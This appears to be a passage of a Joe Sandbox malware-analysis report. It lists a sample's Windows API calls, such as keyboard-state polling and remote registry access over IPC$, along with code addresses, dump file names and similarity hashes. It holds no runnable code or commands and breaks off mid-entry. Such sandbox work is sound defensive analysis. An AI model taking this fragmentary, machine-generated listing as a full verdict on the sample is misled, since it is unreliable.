• DeleteObject.GDI32(?), ref: 0047151E
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
• DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
• DeleteObject.GDI32(?), ref: 004715EA
• DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
• String ID:
• API String ID: 3218148540-0
• Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
• Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
• Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
• Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
• Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
• Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
• Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
APIs
• _wcsncpy.LIBCMT ref: 00467490
• _wcsncpy.LIBCMT ref: 004674BC
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• _wcstok.LIBCMT ref: 004674FF
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcstok.LIBCMT ref: 004675B2
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcscpy.LIBCMT ref: 00467641
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcslen.LIBCMT ref: 004677BD
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                • API String ID: 3104067586-3081909835
                                                                                                                                                                                                                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                                                                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
APIs
• OleInitialize.OLE32(00000000), ref: 0046CBC7
• CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
• CLSIDFromString.OLE32(?,?), ref: 0046CBF1
• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• _wcslen.LIBCMT ref: 0046CDB0
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
• CoTaskMemFree.OLE32(?), ref: 0046CE42
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
Strings
• NULL Pointer assignment, xrefs: 0046CEA6
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
• String ID: NULL Pointer assignment
• API String ID: 440038798-2785691316
• Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
• Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00461056
• GetWindowTextW.USER32(?,?,00000400), ref: 00461092
• _wcslen.LIBCMT ref: 004610A3
• CharUpperBuffW.USER32(?,00000000), ref: 004610B1
• GetClassNameW.USER32(?,?,00000400), ref: 00461124
• GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
• GetClassNameW.USER32(?,?,00000400), ref: 004611A1
• GetClassNameW.USER32(?,?,00000400), ref: 004611D9
• GetWindowRect.USER32(?,?), ref: 00461248
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
• String ID: ThumbnailClass
• API String ID: 4136854206-1241985126
• Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
• Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
• SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
• GetClientRect.USER32(?,?), ref: 00471A1A
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
• DestroyIcon.USER32(?), ref: 00471AF4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
• Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
• Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
• API String ID: 3054410614-2561132961
• Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
• Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CLSIDFromString.OLE32(?,?), ref: 004587B3
• RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
• RegCloseKey.ADVAPI32(?), ref: 004587C5
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 600699880-22481851
• Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
• Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: DestroyWindow
• String ID: static
• API String ID: 3375834691-2160076837
• Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
• Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D959
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
• API String ID: 2907320926-3566645568
• Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
• Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
• Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyAcceleratorTable.USER32(?), ref: 0047094A
• ImageList_Destroy.COMCTL32(?), ref: 004709AD
• ImageList_Destroy.COMCTL32(?), ref: 004709C5
• ImageList_Destroy.COMCTL32(?), ref: 004709D5
• DeleteObject.GDI32(00430000), ref: 00470A04
• DestroyIcon.USER32(0043003D), ref: 00470A1C
• DeleteObject.GDI32(2D4F75A0), ref: 00470A34
• DestroyWindow.USER32(006F0074), ref: 00470A4C
• DestroyIcon.USER32(?), ref: 00470A73
• DestroyIcon.USER32(?), ref: 00470A81
• KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1237572874-0
                                                                                                                                                                                                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                                                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                                                                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                                                                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                                                                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
